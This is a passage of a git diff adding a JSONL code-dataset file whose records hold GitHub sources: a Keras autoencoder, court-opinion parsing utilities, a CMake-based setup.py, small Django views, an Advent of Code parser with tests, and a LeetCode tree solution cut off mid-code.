diff --git "a/4633.jsonl" "b/4633.jsonl" new file mode 100644--- /dev/null +++ "b/4633.jsonl" @@ -0,0 +1,177 @@ +{"seq_id":"3210952243","text":"import typing\n# Bit = typing.NewType(\"Bit\", int)\nfrom typing import Union\n\nfrom bitarray import bitarray\n\n\"\"\"\nBinary one or zero\n\"\"\"\n\nBit = typing.NewType(\"Bit\", int)\nLOW = 0\nHIGH = 1\n\n\ndef nibble(ptr: int = 0) -> bitarray:\n \"\"\"\n return a 0 initialized nibble of bits (4 bits)\n \"\"\"\n assert 0xf >= ptr >= 0, f\"value {ptr} out of range\"\n return bitarray(f\"{bin(ptr)[2:]:{0}>4}\")\n\n\nPointer = Union[bitarray, int]\nMISSING = object()\n\"\"\"\nUsed to represent a missing operand\n\"\"\"\n","repo_name":"theunkn0wn1/SAP1","sub_path":"sap1/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"14004001524","text":"#!/usr/bin/env python3\n\"\"\"\ncreates an autoencoder\n\"\"\"\nimport tensorflow.keras as keras\n\n\ndef buildEncoder(input_dims, hidden_layers, latent_dims):\n \"\"\"build encoder\"\"\"\n encoderInput = keras.Input(shape=(input_dims,))\n x = encoderInput\n\n for units in hidden_layers:\n x = keras.layers.Dense(units=units, activation=\"relu\")(x)\n\n encoderOutput = keras.layers.Dense(\n units=latent_dims, activation=\"relu\"\n )(x)\n\n return (\n keras.Model(inputs=encoderInput, outputs=encoderOutput),\n encoderInput,\n )\n\n\ndef buildDecoder(latent_dims, hidden_layers, output_dims):\n \"\"\"build decoder\"\"\"\n decoderInput = keras.Input(shape=(latent_dims,))\n x = decoderInput\n\n for units in reversed(hidden_layers):\n x = keras.layers.Dense(units=units, activation=\"relu\")(x)\n\n decoderOutput = keras.layers.Dense(\n units=output_dims, activation=\"sigmoid\"\n )(x)\n\n return keras.Model(inputs=decoderInput, outputs=decoderOutput)\n\n\ndef autoencoder(input_dims, hidden_layers, latent_dims):\n \"\"\"\n input_dims is an integer containing\n the dimensions of the model input\n hidden_layers is a list containing\n the number of nodes for each hidden layer\n in the encoder, respectively\n the hidden layers should be reversed for the decoder\n latent_dims is an integer containing\n the dimensions of the latent space representation\n Returns: encoder, decoder, auto\n encoder is the encoder model\n decoder is the decoder model\n auto is the full autoencoder model\n The autoencoder model should be compiled\n using adam optimization and binary cross-entropy loss\n All layers should use a relu activation\n except for the last layer in the decoder,\n which should use sigmoid\n \"\"\"\n encoder, encoderInput = buildEncoder(\n input_dims, hidden_layers, latent_dims\n )\n decoder = buildDecoder(latent_dims, hidden_layers, input_dims)\n\n encodedOutput = encoder(encoderInput)\n decodedOutput = decoder(encodedOutput)\n\n auto = keras.Model(inputs=encoderInput, outputs=decodedOutput)\n auto.compile(optimizer=\"adam\", loss=\"binary_crossentropy\")\n\n return encoder, decoder, auto\n","repo_name":"spindouken/holbertonschool-machine_learning","sub_path":"unsupervised_learning/autoencoders/0-vanilla.py","file_name":"0-vanilla.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"32624275610","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 8 09:34:01 2019\n\n@author: dan\n\"\"\"\n\n\n### Imports\n\nimport os\nimport re\nfrom dateutil.parser import parse as parseDate\n\nfrom OPparser_lists import validEndPeriodWords, sepLinesList, caseNoRE1, caseNoRE2, caseNoRE3, caseNoRE4, caseNoRE5\n\n\n\n\n### Globals\n\nCaseNameCaseList = [\"LLC\", \"LP\", \"LLP\", \"SS\", \"II\", \"III\", \"IV\", \"V\", \"VI\", \n \"VII\", \"VIII\", \"IX\", \"X\", \"XI\", \"XII\", \"XIII\", \"XIV\", \"XV\", \n \"XVI\", \"XVII\", \"XVIII\", \"XIX\", \"XX\", \"CDO\"]\n\n\n\n### Paths\n\nchromeDriver = \"/home/dan/ChromeDriver/chromedriver\"\nrawDataDir_DEGOV = \"/home/dan/Data/DelawareGov/Raw/\"\nproDataDir_DEGOV = \"/home/dan/Data/DelawareGov/Processed/\"\nrawDataDir_CL = \"/home/dan/Data/CourtListener/Raw/Extracted/\"\ncompressedDataDir_CL = \"/home/dan/Data/CourtListener/Raw/Compressed/\"\nproDataDir_CL = \"/home/dan/Data/CourtListener/Processed/\"\n\n\n\n### Data URLs\n\nseed_DEGOV = 'https://courts.delaware.gov/opinions'\n\n\nseed_DECL = {'del': 'https://www.courtlistener.com/api/bulk-data/opinions/del.tar.gz',\n 'delch': 'https://www.courtlistener.com/api/bulk-data/opinions/delch.tar.gz',\n 'delsuperct': 'https://www.courtlistener.com/api/bulk-data/opinions/delsuperct.tar.gz',\n 'delctcompl': 'https://www.courtlistener.com/api/bulk-data/opinions/delctcompl.tar.gz',\n 'delfamct': 'https://www.courtlistener.com/api/bulk-data/opinions/delfamct.tar.gz',\n 'deljudct': 'https://www.courtlistener.com/api/bulk-data/opinions/deljudct.tar.gz'}\n\nseed_PACL = {'pa': 'https://www.courtlistener.com/api/bulk-data/opinions/pa.tar.gz',\n 'pasuperct': 'https://www.courtlistener.com/api/bulk-data/opinions/pasuperct.tar.gz',\n 'pacommwct': 'https://www.courtlistener.com/api/bulk-data/opinions/pacommwct.tar.gz',\n 'cjdpa': 'https://www.courtlistener.com/api/bulk-data/opinions/cjdpa.tar.gz'}\n\n\nseed_USCL = {'scotus':'https://www.courtlistener.com/api/bulk-data/opinions/scotus.tar.gz',\n 'ca2':'https://www.courtlistener.com/api/bulk-data/opinions/ca2.tar.gz',\n 'ca3':'https://www.courtlistener.com/api/bulk-data/opinions/ca3.tar.gz', \n 'ded':'https://www.courtlistener.com/api/bulk-data/opinions/ded.tar.gz',\n 'deb':'https://www.courtlistener.com/api/bulk-data/opinions/deb.tar.gz', \n 'paed':'https://www.courtlistener.com/api/bulk-data/opinions/paed.tar.gz', \n 'pamd':'https://www.courtlistener.com/api/bulk-data/opinions/pamd.tar.gz', \n 'pawd':'https://www.courtlistener.com/api/bulk-data/opinions/pawd.tar.gz', \n 'paeb':'https://www.courtlistener.com/api/bulk-data/opinions/paeb.tar.gz', \n 'pamb':'https://www.courtlistener.com/api/bulk-data/opinions/pamb.tar.gz', \n 'pawb':'https://www.courtlistener.com/api/bulk-data/opinions/pawb.tar.gz',\n 'njd':'https://www.courtlistener.com/api/bulk-data/opinions/njd.tar.gz', \n 'njb':'https://www.courtlistener.com/api/bulk-data/opinions/njb.tar.gz',}\n# 'nyeb':'https://www.courtlistener.com/api/bulk-data/opinions/nyeb.tar.gz', \n# 'nynb':'https://www.courtlistener.com/api/bulk-data/opinions/nynb.tar.gz', \n# 'nysb':'https://www.courtlistener.com/api/bulk-data/opinions/nysb.tar.gz', \n# 'nywb':'https://www.courtlistener.com/api/bulk-data/opinions/nywb.tar.gz', \n# 'nyed':'https://www.courtlistener.com/api/bulk-data/opinions/nyed.tar.gz', \n# 'nynd':'https://www.courtlistener.com/api/bulk-data/opinions/nynd.tar.gz', \n# 'nysd':'https://www.courtlistener.com/api/bulk-data/opinions/nysd.tar.gz', \n# 'nywd':'https://www.courtlistener.com/api/bulk-data/opinions/nywd.tar.gz',\n# 'ctd':'https://www.courtlistener.com/api/bulk-data/opinions/ctd.tar.gz', \n# 'ctb':'https://www.courtlistener.com/api/bulk-data/opinions/ctb.tar.gz',\n# 'vtd':'https://www.courtlistener.com/api/bulk-data/opinions/vtd.tar.gz', \n# 'vtb':'https://www.courtlistener.com/api/bulk-data/opinions/vtb.tar.gz'}\n\n\n### Functions\n\ndef fixCaseNameCase(caseName):\n wordlist = caseName.strip().split()\n newlist = []\n for word in wordlist:\n if word.isupper():\n if word not in CaseNameCaseList: \n newword = getTitle0(word)\n newlist.append(newword)\n else: newlist.append(word)\n else: newlist.append(word)\n newtext = ' '.join(newlist)\n newtext = newtext.replace(\"In Re\", \"In re\") # AD HOC FIX\n return newtext\n\n\n\n\n\ndef removeCaseNos(text):\n text = caseNoRE3.sub(\"\", text) # Remove case numbers #1 (Del Superior Style) ORDER MATTERS: THIS IS MORE \"GREEDY\" THAN OTHERS; RUNNING THE OTHERS FIRST WILL LEAVE FRAGMENTS OF CASE NUMBERS THIS ONE WAS MEANT TO CATCH!!!\n text = caseNoRE1.sub(\"\", text) # Remove case numbers #2 (Del Supreme Style)\n text = caseNoRE2.sub(\"\", text) # Remove case numbers #3 (Del Chancery Old Style)\n text = caseNoRE4.sub(\"\", text)\n text = caseNoRE5.sub(\"\", text)\n text = text.strip()\n return text\n\n\n\n\n\n\ndef getFileList(path, ext='', recursive=False):\n fileList = []\n if not path.endswith('/'): path = path + '/'\n if recursive:\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(ext): fileList.append(str(os.path.join(root, file)))\n else:\n fileList = [path + file for file in os.listdir(path)\\\n if os.path.isfile(os.path.join(path, file)) and file.endswith(ext)]\n return fileList\n\n\n\n\n\ndef numLowerCaseWords(string):\n wordList = string.split()\n numLCwords = 0\n for word in wordList:\n if word.islower(): numLCwords += 1\n return numLCwords\n\n\n\n\n\ndef getTitle0(word):\n newword = word.title()\n if \"'\" in word:\n pos = word.find(\"'\")\n if len(word) > pos + 1:\n newword = newword[:pos+1] + newword[pos+1].lower() + newword[pos+2:]\n return newword\n\n\n\n\n\ndef addAmpersands(rawParties):\n rawParties = rawParties.replace('Oil and Gas', 'Oil & Gas')\n rawParties = rawParties.replace('Oil and Refining', 'Oil & Refining')\n rawParties = rawParties.replace('Current and Former', 'Current & Former')\n rawParties = rawParties.replace('Health, Education and Welfare', 'Health Education & Welfare')\n rawParties = rawParties.replace(\"PENSION AND RETIREMENT\", \"PENSION & RETIREMENT\")\n rawParties = rawParties.replace('OFFICERS AND FIREFIGHTERS', 'OFFICERS & FIREFIGHTERS')\n return rawParties\n\n\n\n\n\ndef stripPeriods(partyString):\n\n newPartyString = ''\n partyList = partyString.split(';')\n\n for party in partyList:\n\n removeEndPeriod = False\n removeStartPeriod = False\n\n if party.endswith('.'):\n removeEndPeriod = True\n for word in validEndPeriodWords:\n if party.lower().endswith(word): removeEndPeriod = False\n if len(partyString) >= 4:\n if (partyString[-3] == '.') and (partyString[-2].isupper()) and (partyString[-4].isupper()):\n removeEndPeriod = False\n\n if party.startswith('.'): removeStartPeriod = True\n\n if removeEndPeriod and removeStartPeriod: newPartyString += party[1:-1] + ';'\n elif removeEndPeriod: newPartyString += party[:-1] + ';'\n elif removeStartPeriod: newPartyString += party[1:] + ';'\n else: newPartyString += party + ';'\n\n if newPartyString.endswith(';'): newPartyString = newPartyString[:-1]\n\n # Remove starting and ending spaces from each entry in the party list\n finalPartyList = [party[1:] if party.startswith(' ') else party for party in newPartyString.split(';')]\n finalPartyList = [party[:-1] if party.endswith(' ') else party for party in finalPartyList]\n finalPartyString = ';'.join(finalPartyList)\n\n return finalPartyString\n\n\n\n\n\ndef replaceCase(replaceDict, word):\n\n # ONLY works on uppercase, lowercase, and titlecase words\n upperFlag = False\n titleFlag = False\n lowerFlag = False\n if word.isupper(): upperFlag = True\n elif word.istitle(): titleFlag = True\n elif word.islower(): lowerFlag = True\n else:\n return word\n\n if word.lower() in replaceDict.keys(): newword = replaceDict[word.lower()]\n else: newword = word\n\n if lowerFlag: return newword\n elif upperFlag: return newword.upper()\n elif titleFlag: return newword[0].upper() + newword[1:] # Fixes cases like \"emp't\", which would return \"Emp'T' if we simply did neword.title()\n else: return word\n\n \n\n\n\ndef cutWords(wordList, string):\n for word in wordList:\n searchFlag = True\n while searchFlag == True:\n startPos = string.lower().find(word)\n if startPos > -1: \n string = string[:startPos] + string[startPos + len(word):]\n else:\n searchFlag = False\n return string\n\n\n\n\n\ndef cutWords2(wordList, string):\n for word in wordList:\n regex = re.compile(re.escape(word), re.IGNORECASE)\n string = regex.sub('', string)\n string = string.strip()\n return string\n\n\n\n\n\ndef isDate(string): \n try:\n parseDate(string, fuzzy=True).date().isoformat()\n return True\n except:\n return False\n\n\n\n\n\ndef deleteSepLines(pageList):\n\n if len(pageList) < 2:\n return pageList\n \n else:\n newPageList = []\n for page in pageList:\n if type(page) == int:\n newPageList.append(page)\n else:\n newPage = [line for line in page if (line not in sepLinesList)]\n newPageList.append(newPage)\n return newPageList\n\n\n\n\n\n#Delete preceding and trailing lines that are just '\\n' and nothing else\ndef delExtraNewlines(lineList):\n lineList = delPrecedingNewlines(lineList)\n lineList = delTrailingNewlines(lineList)\n return lineList\n\n#Recursively delete preceding lines that are just '\\n' or spaces and nothing else\ndef delPrecedingNewlines(lineList):\n if len(lineList) < 1: return lineList\n if lineList[0].strip() == '': return delPrecedingNewlines(lineList[1:])\n else: return lineList\n\n#Recursively delete trailing lines that are just '\\n' or spaces and nothing else\ndef delTrailingNewlines(lineList):\n if len(lineList) < 1: return lineList\n if lineList[-1].strip() == '': return delTrailingNewlines(lineList[:-1])\n else: return lineList\n\n\n\n\n\ndef isTitleCase(string):\n \n wordReplace = {'of':'Of', 'the':'The', 'and':'And', 'a':'A', 'for':'For', \n 'to':'To', 'on':'On', 'with':'With', 'that':'That', '\\n':''}\n wordList = string.split()\n newWordList = []\n for word in wordList:\n if word in wordReplace.keys(): newWordList.append(wordReplace[word])\n else:newWordList.append(word)\n newstring = ' '.join(newWordList)\n\n return newstring.istitle()\n\n\n\n# Significantly more permissive than the last one; used for section-header detection in mainText formatting\ndef isTitleCase2(string):\n\n if len(string) == 0: return False\n \n # Remove all numbers and some misc punctuation\n newstring = re.sub('\\d+', '', string)\n newstring = newstring.replace(' . ', '')\n if newstring.startswith('.'): newstring = newstring[1:]\n\n # Remove apostrophe's and quotation marks\n newstring = newstring.replace('’', '').replace('\\'', '').replace('\\\"', '')\n\n # Remove lowercase section heading characters\n newstring = re.sub(r'^[a-z]\\.(\\s+[A-Z])', r'\\1', newstring) # E.G.: \"a. Approval of the Merger\"\n newstring = re.sub(r'\\([a-z]\\)', '', newstring) # Fixes cases like: \"Section 1.2(c)\"\n\n # Set of tokens that can be lowercase in titles\n wordSet = {'of', 'the', 'and', 'a', 'an', 'for', 'to', 'on', 'with', \n 'that', 'in', 'is', '\\n'}\n\n # Create list of words; return True if the list is empty (i.e., the \n # previous operations removed all words)\n wordList = newstring.strip().split()\n if len(wordList) == 0: return True\n\n # Main Loop: counts number of impermissible lower case words\n lcCounter = 0\n for word in wordList:\n if word[0].isupper(): continue\n if word in wordSet: continue\n lcCounter += 1\n\n # Compute \"Lowercase Quotient\", i.e. the ratio of imperissible lower case words to words\n lcQ = lcCounter / len(wordList)\n\n # Returns True if there are NO impermissible LC words; might need to tune how this works\n return (lcQ == 0)\n\n\n\n\n\ndef flatten(listOfStrings):\n flatVersion = ''\n for line in listOfStrings:\n flatVersion += line\n return flatVersion\n\n\n\n\n\ndef delExcessLineSpaces(text):\n newText = []\n for page in text:\n newPage = delPrecedingLineSpaces(page)\n newPage = delTrailingLineSpaces(newPage)\n newText.append(newPage)\n return newText\n\n\ndef delPrecedingLineSpaces(page):\n if page == []: return page\n if page[0].strip() == '': return delPrecedingLineSpaces(page[1:])\n else: return page\n\n\ndef delTrailingLineSpaces(page):\n if page == []: return page\n if page[-1].strip() == '': return delTrailingLineSpaces(page[:-1])\n else: return page\n\n\n\n\n\ndef getMaxLL(text):\n lineLens = sorted([len(line) for page in text for line in page])\n if len(lineLens) > 350: maxLen = lineLens[int(.99 * len(lineLens))]\n elif len(lineLens) > 0: maxLen = lineLens[int(.98 * len(lineLens))]\n else: maxLen = 0\n return maxLen\n\n\n\n\n\n\ndef getCtDirFromCLlink(text):\n\n saveDir = \"\"\n if \"del.tar\" in text: saveDir = \"/Delaware/Supreme/\"\n elif \"delch.tar\" in text: saveDir = \"/Delaware/Chancery/\"\n elif \"delsuperct.tar\" in text: saveDir = \"/Delaware/Superior/\"\n elif \"delctcompl.tar\" in text: saveDir = \"/Delaware/CommonPleas/\"\n elif \"delfamct.tar\" in text: saveDir = \"/Delaware/Family/\"\n elif \"deljudct.tar\" in text: saveDir = \"/Delaware/Judicial/\"\n\n elif 'pa.tar' in text: saveDir = \"/Pennsylvania/Supreme/\"\n elif 'pacommwct.tar' in text: saveDir = \"/Pennsylvania/Commonwealth/\"\n elif 'pasuperct.tar' in text: saveDir = \"/Pennsylvania/Superior/\"\n elif 'cjdpa.tar' in text: saveDir = \"/Pennsylvania/Judicial/\"\n \n elif 'scotus.tar' in text: saveDir = \"/Federal/scotus/\"\n elif 'ca2' in text: saveDir = \"/Federal/ca2/\"\n elif 'ca3' in text: saveDir = \"/Federal/ca3/\"\n elif 'ded' in text: saveDir = \"/Federal/ded/\"\n elif 'deb' in text: saveDir = \"/Federal/deb/\"\n elif 'paed' in text: saveDir = \"/Federal/paed/\"\n elif 'pamd' in text: saveDir = \"/Federal/pamd/\"\n elif 'pawd' in text: saveDir = \"/Federal/pawd/\"\n elif 'paeb' in text: saveDir = \"/Federal/paeb/\"\n elif 'pamb' in text: saveDir = \"/Federal/pamb/\"\n elif 'pawb' in text: saveDir = \"/Federal/pawb/\"\n elif 'njd' in text: saveDir = \"/Federal/njd/\"\n elif 'njb' in text: saveDir = \"/Federal/njb/\"\n elif 'nyed' in text: saveDir = \"/Federal/nyed/\"\n elif 'nynd' in text: saveDir = \"/Federal/nynd/\"\n elif 'nysd' in text: saveDir = \"/Federal/nysd/\"\n elif 'nywd' in text: saveDir = \"/Federal/nywd/\"\n elif 'nyeb' in text: saveDir = \"/Federal/nyeb/\"\n elif 'nynb' in text: saveDir = \"/Federal/nynb/\"\n elif 'nysb' in text: saveDir = \"/Federal/nysb/\"\n elif 'nywb' in text: saveDir = \"/Federal/nywb/\"\n elif 'ctd' in text: saveDir = \"/Federal/ctd/\"\n elif 'ctb' in text: saveDir = \"/Federal/ctb/\"\n elif 'vtd' in text: saveDir = \"/Federal/vtd/\"\n elif 'vtb' in text: saveDir = \"/Federal/vtb/\"\n\n else: saveDir = \"\"\n \n return saveDir\n\n\n\n","repo_name":"ciarrocki/LibreLaw","sub_path":"OPparser/OPparser_utils.py","file_name":"OPparser_utils.py","file_ext":"py","file_size_in_byte":15481,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"55"} +{"seq_id":"14990663933","text":"\"\"\"Holds all relevant information for packaging and publishing to PyPI.\"\"\"\nfrom setuptools import Extension, setup\nfrom setuptools.command.build_ext import build_ext\n\nimport os\nfrom pathlib import Path\nimport platform\nimport re\nimport subprocess\nimport sys\nfrom distutils.version import LooseVersion\n\nVERSION = \"3.3.1\"\n\n\nwith open(\"INFO.md\") as readme_file:\n readme = readme_file.read()\n\n# List any runtime requirements here\nrequirements = [\"numpy\", \"cmake\", \"xmltodict\"]\n\n\nclass CMakeExtension(Extension):\n def __init__(self, name, sourcedir=\"\"):\n Extension.__init__(self, name, sources=[])\n self.sourcedir = os.path.abspath(sourcedir)\n\n\nclass CMakeBuild(build_ext):\n def run(self):\n try:\n out = subprocess.check_output([\"cmake\", \"--version\"])\n except OSError:\n raise RuntimeError(\n \"CMake must be installed and available at PATH ({0}) to build the following extensions: {1}\".format(\n os.environ.get(\"PATH\"), \", \".join(e.name for e in self.extensions)\n )\n )\n cmake_version = LooseVersion(re.search(r\"version\\s*([\\d.]+)\", out.decode()).group(1))\n if platform.system() == \"Windows\":\n cmake_version = LooseVersion(re.search(r\"version\\s*([\\d.]+)\", out.decode()).group(1))\n if cmake_version < \"3.1.0\":\n raise RuntimeError(\"CMake >= 3.1.0 is required on Windows\")\n\n for ext in self.extensions:\n self.build_extension(ext)\n\n def build_extension(self, ext):\n path_var = os.environ.get(\"PATH\")\n path_var = str(Path(sys.executable).parent) + \":\" + path_var\n env = dict(os.environ.copy(), PATH=path_var)\n extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n cmake_args = [\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=\" + extdir,\n \"-DPYTHON_EXECUTABLE=\" + sys.executable, # used for pybind11\n \"-DLIBCZI_BUILD_UNITTESTS=\" + \"OFF\", # used for libczi\n \"-DLIBCZI_BUILD_CZICMD=\" + \"OFF\", # used for libczi\n \"-DLIBCZI_BUILD_CZICHECK=\" + \"OFF\"] # used for libczi\n\n cfg = \"Debug\" if self.debug else \"Release\"\n build_args = [\"--config\", cfg]\n\n if platform.system() == \"Windows\":\n cmake_args += [\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}\".format(cfg.upper(), extdir)]\n cmake_args += [\"-DCMAKE_GENERATOR_PLATFORM=x64\"]\n build_args += [\"--\", \"/m\"]\n else:\n cmake_args += [\"-DCMAKE_BUILD_TYPE=\" + cfg]\n build_args += [\"--\", \"-j2\"]\n\n env[\"CXXFLAGS\"] = '{} -DVERSION_INFO=\\\\\"{}\\\\\"'.format(env.get(\"CXXFLAGS\", \"\"), self.distribution.get_version())\n if not os.path.exists(self.build_temp):\n os.makedirs(self.build_temp)\n subprocess.check_call([\"cmake\", ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env)\n subprocess.check_call(\n [\"cmake\", \"--build\", \".\", \"--target\", \"_pylibCZIrw\"] + build_args, cwd=self.build_temp, env=env\n )\n\nsetup(\n name=\"pylibCZIrw\",\n version=VERSION,\n author=\"Felix Scheffler\",\n author_email=\"felix.scheffler@zeiss.com\",\n description=\"A python wrapper around the libCZI C++ library with reading and writing functionality.\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n # See https://setuptools.pypa.io/en/latest/userguide/datafiles.html\n include_package_data=True,\n keywords=\"czi, imaging\",\n ext_modules=[CMakeExtension(\"_pylibCZIrw\")],\n packages=[\"pylibCZIrw\"],\n cmdclass=dict(build_ext=CMakeBuild),\n install_requires=requirements,\n # we require at least python version 3.7\n python_requires=\">=3.7,<4\",\n license_files=['COPYING.txt', 'COPYING.LESSER.txt', 'NOTICE.txt'],\n # Classifiers help users find your project by categorizing it.\n # For a list of valid classifiers, see https://pypi.org/classifiers/\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Topic :: Scientific/Engineering :: Image Processing\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: Unix\"\n ],\n zip_safe=False,\n)\n","repo_name":"luv-kotoli/pylibczirw","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"7232238628","text":"\n# 3. Smallest Number\n# Given an list of numbers, print the smallest of the numbers.\n\nnum_list = [9, -2, 5, 3, 1]\n\ndef smallest(numbers):\n numbers.sort()\n return numbers[0]\n\nprint(smallest(num_list))\n","repo_name":"Richiewong07/Python-Exercises","sub_path":"python-assignments/list/smallest_number.py","file_name":"smallest_number.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"30363018570","text":"#from django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef hi(request,x,y):\n #w = request.GET.get('w')\n #return HttpResponse('

{}

',format(x / y))\n s = x + y\n return render(request,'hi.html',{'s':s},)\n\ndef r(request,x1,y1):\n\n if x1 > y1:\n x1 , y1 = y1 , x1\n rang1 = range(x1,y1+1)\n rang1 = reversed(rang1)\n else:\n rang1 = range(x1, y1 + 1)\n\n return render(request,'r.html',{'rang1':rang1},)\n\ndef tag_test(request):\n ll = [2,4,6,8,10,12,2,4,6,8,10,12]\n\n return render(request,'tag_test.html',{'ll':ll},)","repo_name":"hmr0836/django","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"39647623577","text":"import io\nimport pytest\n\nclass Leaf:\n def __init__(self,c):\n self.c = c\n def __repr__(self):\n return self.c\n\ndef parse(fp):\n messages_now = False\n messages = []\n\n tbl = {}\n for line in fp:\n line = line.rstrip('\\n')\n state = None\n expr = []\n term = []\n for token in line.split(\" \"):\n if messages_now:\n if len(token) == 0:\n pass\n else:\n messages.append(token)\n else:\n if len(token) == 0:\n messages_now = True\n elif token[-1] == ':':\n state = int(token[:-1])\n elif token == '|':\n expr.append(term)\n term = []\n elif token[0] == '\"':\n term.append(Leaf(token[1]))\n else:\n term.append(int(token))\n if not messages_now:\n expr.append(term)\n tbl[state] = expr\n return tbl, messages\n\ndef isvalid( tbl, message):\n \n def gen0( rule, cursor):\n if type(rule) == Leaf:\n if cursor < len(message) and message[cursor] == rule.c:\n yield cursor+1\n else:\n yield from gen2( tbl[rule], cursor)\n\n def gen1( lst, cursor):\n if len(lst) == 0:\n yield cursor\n else:\n for next_cursor in gen0( lst[0], cursor):\n yield from gen1( lst[1:], next_cursor)\n\n def gen2( lol, cursor):\n for lst in lol:\n yield from gen1(lst, cursor)\n\n for next_cursor in gen0( 0, 0):\n if next_cursor == len(message):\n return True\n\n return False\n\n\ndef main(fp):\n tbl, messages = parse(fp)\n\n count = 0\n for message in messages:\n if isvalid( tbl, message):\n count += 1\n\n print(f\"count: {count}\")\n return count\n \ndef test_A():\n txt = \"\"\"0: 4 1 5\n1: 2 3 | 3 2\n2: 4 4 | 5 5\n3: 4 5 | 5 4\n4: \"a\"\n5: \"b\"\n\nababbb\nbababa\nabbbab\naaabbb\naaaabbb\n\"\"\"\n\n with io.StringIO(txt) as fp:\n assert main(fp) == 2\n\ndef test_AA():\n txt = \"\"\"0: 4 5 | 4 0 5\n4: \"a\"\n5: \"b\"\n\na\nb\nab\naabb\naaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbb\naabbb\n\"\"\"\n with io.StringIO(txt) as fp:\n assert main(fp) == 3\n\ndef test_AAA():\n txt = \"\"\"0: 2\n2: \"a\" 2 \"a\" | \"a\" \"a\"\n\naaaa\naa\naaa\na\n\"\"\"\n with io.StringIO(txt) as fp:\n assert main(fp) == 2\n\ndef test_AAAA():\n txt = \"\"\"0: 1\n1: \"b\" 1 | \"b\"\n\nbb\nbbb\n\"\"\"\n with io.StringIO(txt) as fp:\n assert main(fp) == 2\n\ndef test_AAAAA():\n txt = \"\"\"0: \"b\" | \"b\" 0\n\nbbb\n\"\"\"\n with io.StringIO(txt) as fp:\n assert main(fp) == 1\n\ndef test_B():\n txt = \"\"\"0: 1 2\n1: \"a\"\n2: \"b\"\n\nab\naba\nba\na\nb\n\"\"\"\n with io.StringIO(txt) as fp:\n assert main(fp) == 1\n\ndef test_C():\n with open( \"data\", \"rt\") as fp:\n main(fp)\n\ndef test_D():\n with open( \"data1\", \"rt\") as fp:\n main(fp)\n","repo_name":"stevenmburns/adventofcode","sub_path":"2020/19/test_A.py","file_name":"test_A.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"40252919363","text":"\"\"\"\nGiven the root of a binary tree and an integer distance. A pair of two different leaf nodes of a binary tree \nis said to be good if the length of the shortest path between them is less than or equal to distance.\n\nReturn the number of good leaf node pairs in the tree.\n\nExample 1:\n\nInput: root = [1,2,3,null,4], distance = 3\nOutput: 1\nExplanation: The leaf nodes of the tree are 3 and 4 and the length of the shortest path between them is 3. \nThis is the only good pair.\n\nExample 2:\n\n\nInput: root = [1,2,3,4,5,6,7], distance = 3\nOutput: 2\nExplanation: The good pairs are [4,5] and [6,7] with shortest path = 2. The pair [4,6] is not good because the \nlength of ther shortest path between them is 4.\n\nExample 3:\n\nInput: root = [7,1,4,6,null,5,3,null,null,null,null,null,2], distance = 3\nOutput: 1\nExplanation: The only good pair is [2,5].\n\nExample 4:\n\nInput: root = [100], distance = 1\nOutput: 0\n\nExample 5:\n\nInput: root = [1,1,1], distance = 2\nOutput: 1\n\nConstraints:\n\nThe number of nodes in the tree is in the range [1, 2^10].\nEach node's value is between [1, 100].\n1 <= distance <= 10\n\"\"\"\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n# # DFS: 对于每一个节点,找他的左节点下所有叶子节点高度和右节点下所有叶子节点高度。对于所有叶子节点的高度,\n# # 如果左叶子节点的高度+右叶子节点的高度<=distance,就把 cnt 加 1。(这是叶子节点在左右边的情况)\n# # 然后还要加上叶子节点在同一边的情况\n# # 但这个会多次计算节点高度,时间复杂度高\n# class Solution:\n# def countPairs(self, root: TreeNode, distance: int) -> int:\n# def findAllLeafsHeight(node, currHeight, heights):\n# if not node: return []\n\n# if not node.left and not node.right:\n# heights.append(currHeight)\n# return\n\n# findAllLeafsHeight(node.left, currHeight + 1, heights)\n# findAllLeafsHeight(node.right, currHeight + 1, heights)\n\n# def dfs(node, distance):\n# if not node: return 0\n\n# cnt = 0\n# leftHeights = []\n# rightHeights = []\n# findAllLeafsHeight(node.left, 1, leftHeights)\n# findAllLeafsHeight(node.right, 1, rightHeights)\n\n# leftHeights.sort()\n# rightHeights.sort()\n\n# for leftHeight in leftHeights:\n# if leftHeight >= distance: break\n\n# for rightHeight in rightHeights:\n# if leftHeight + rightHeight <= distance:\n# cnt += 1\n# else:\n# break\n\n# return cnt + dfs(node.left, distance) + dfs(node.right, distance)\n\n# return dfs(root, distance)\n\n# 需要使用一个全局变量来保存结果\nclass Solution:\n def __init__(self):\n self.res = 0\n \n def countPairs(self, root: TreeNode, 